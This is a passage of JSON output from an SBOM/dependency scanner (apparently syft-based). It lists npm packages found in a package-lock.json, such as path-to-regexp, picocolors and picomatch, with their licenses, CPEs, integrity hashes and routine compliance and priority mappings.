"/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:parseurl:parseurl:1.3.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/parseurl@1.3.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/parseurl/-/parseurl-1.3.3.tgz", "integrity": "sha512-CiyeOxFT/JZyN5m0z9PfXw4SCBJ6Sygz1Dpl0wqjlhDEGGBP1GnsUVEL0p63hoG1fcj3fHynXi9NYO4nWOL+qQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "4b3d2fa0f1f98ea0", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: path-exists 4.0.0", "title": "path-exists 4.0.0", "description": "Package discovered: path-exists 4.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "7c130f49f1f39739", "name": "path-exists", "version": "4.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:path-exists:path-exists:4.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:path-exists:path_exists:4.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:path_exists:path-exists:4.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:path_exists:path_exists:4.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:path:path-exists:4.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:path:path_exists:4.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/path-exists@4.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "5bb936b7686247f0", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: path-expression-matcher 1.5.0", "title": "path-expression-matcher 1.5.0", "description": "Package discovered: path-expression-matcher 1.5.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "802e4db060f878e6", "name": "path-expression-matcher", "version": "1.5.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:path-expression-matcher:path-expression-matcher:1.5.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:path-expression-matcher:path_expression_matcher:1.5.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:path_expression_matcher:path-expression-matcher:1.5.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:path_expression_matcher:path_expression_matcher:1.5.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:path-expression:path-expression-matcher:1.5.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:path-expression:path_expression_matcher:1.5.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:path_expression:path-expression-matcher:1.5.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:path_expression:path_expression_matcher:1.5.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:path:path-expression-matcher:1.5.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:path:path_expression_matcher:1.5.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/path-expression-matcher@1.5.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/path-expression-matcher/-/path-expression-matcher-1.5.0.tgz", "integrity": "sha512-cbrerZV+6rvdQrrD+iGMcZFEiiSrbv9Tfdkvnusy6y0x0GKBXREFg/Y65GhIfm0tnLntThhzCnfKwp1WRjeCyQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "ffd71e909718c27d", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: path-key 3.1.1", "title": "path-key 3.1.1", "description": "Package discovered: path-key 3.1.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "f9cf628256388076", "name": "path-key", "version": "3.1.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:path-key:path-key:3.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:path-key:path_key:3.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:path_key:path-key:3.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:path_key:path_key:3.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:path:path-key:3.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:path:path_key:3.1.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/path-key@3.1.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "fbb7614ee3db4371", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: path-parse 1.0.7", "title": "path-parse 1.0.7", "description": "Package discovered: path-parse 1.0.7", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "9cf335be710ffc91", "name": "path-parse", "version": "1.0.7", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:path-parse_project:path-parse:1.0.7:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/path-parse@1.0.7", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "135178fee69fc7b7", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: path-scurry 1.11.1", "title": "path-scurry 1.11.1", "description": "Package discovered: path-scurry 1.11.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "f605927959537dfd", "name": "path-scurry", "version": "1.11.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "BlueOak-1.0.0", "spdxExpression": "BlueOak-1.0.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:path-scurry:path-scurry:1.11.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:path-scurry:path_scurry:1.11.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:path_scurry:path-scurry:1.11.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:path_scurry:path_scurry:1.11.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:path:path-scurry:1.11.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:path:path_scurry:1.11.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/path-scurry@1.11.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/path-scurry/-/path-scurry-1.11.1.tgz", "integrity": "sha512-Xa4Nw17FS9ApQFJ9umLiJS4orGjm7ZzwUrwamcGQuHSzDyth9boKDaycYdDcZDuqYATXw4HFXgaqWTctW/v1HA==", "dependencies": { "lru-cache": "^10.2.0", "minipass": "^5.0.0 || ^6.0.2 || ^7.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "ad5632f7c396e60c", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: path-to-regexp 0.1.13", "title": "path-to-regexp 0.1.13", "description": "Package discovered: path-to-regexp 0.1.13", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "e6c60d0f52ae43b7", "name": "path-to-regexp", "version": "0.1.13", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:path-to-regexp:path-to-regexp:0.1.13:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:path-to-regexp:path_to_regexp:0.1.13:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:path_to_regexp:path-to-regexp:0.1.13:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:path_to_regexp:path_to_regexp:0.1.13:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:path-to:path-to-regexp:0.1.13:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:path-to:path_to_regexp:0.1.13:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:path_to:path-to-regexp:0.1.13:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:path_to:path_to_regexp:0.1.13:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:path:path-to-regexp:0.1.13:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:path:path_to_regexp:0.1.13:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/path-to-regexp@0.1.13", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/path-to-regexp/-/path-to-regexp-0.1.13.tgz", "integrity": "sha512-A/AGNMFN3c8bOlvV9RreMdrv7jsmF9XIfDeCd87+I8RNg6s78BhJxMu69NEMHBSJFxKidViTEdruRwEk/WIKqA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "c2433fd071fcfad6", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: peberminta 0.9.0", "title": "peberminta 0.9.0", "description": "Package discovered: peberminta 0.9.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "f3acb6a3529e1191", "name": "peberminta", "version": "0.9.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:peberminta:peberminta:0.9.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/peberminta@0.9.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/peberminta/-/peberminta-0.9.0.tgz", "integrity": "sha512-XIxfHpEuSJbITd1H3EeQwpcZbTLHc+VVr8ANI9t5sit565tsI4/xK3KWTUFE2e6QiangUkh3B0jihzmGnNrRsQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "bd0577c6ddbc7f17", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: picocolors 1.1.1", "title": "picocolors 1.1.1", "description": "Package discovered: picocolors 1.1.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "9b208867cdc8b323", "name": "picocolors", "version": "1.1.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:picocolors:picocolors:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/picocolors@1.1.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz", "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "2e6faecb84cf8a8b", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: picomatch 2.3.2", "title": "picomatch 2.3.2", "description": "Package discovered: picomatch 2.3.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "0c0ba7fcf7a893f6", "name": "picomatch", "version": "2.3.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:jonschlinkert:picomatch:2.3.2:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/picomatch@2.3.2", "metadataType": 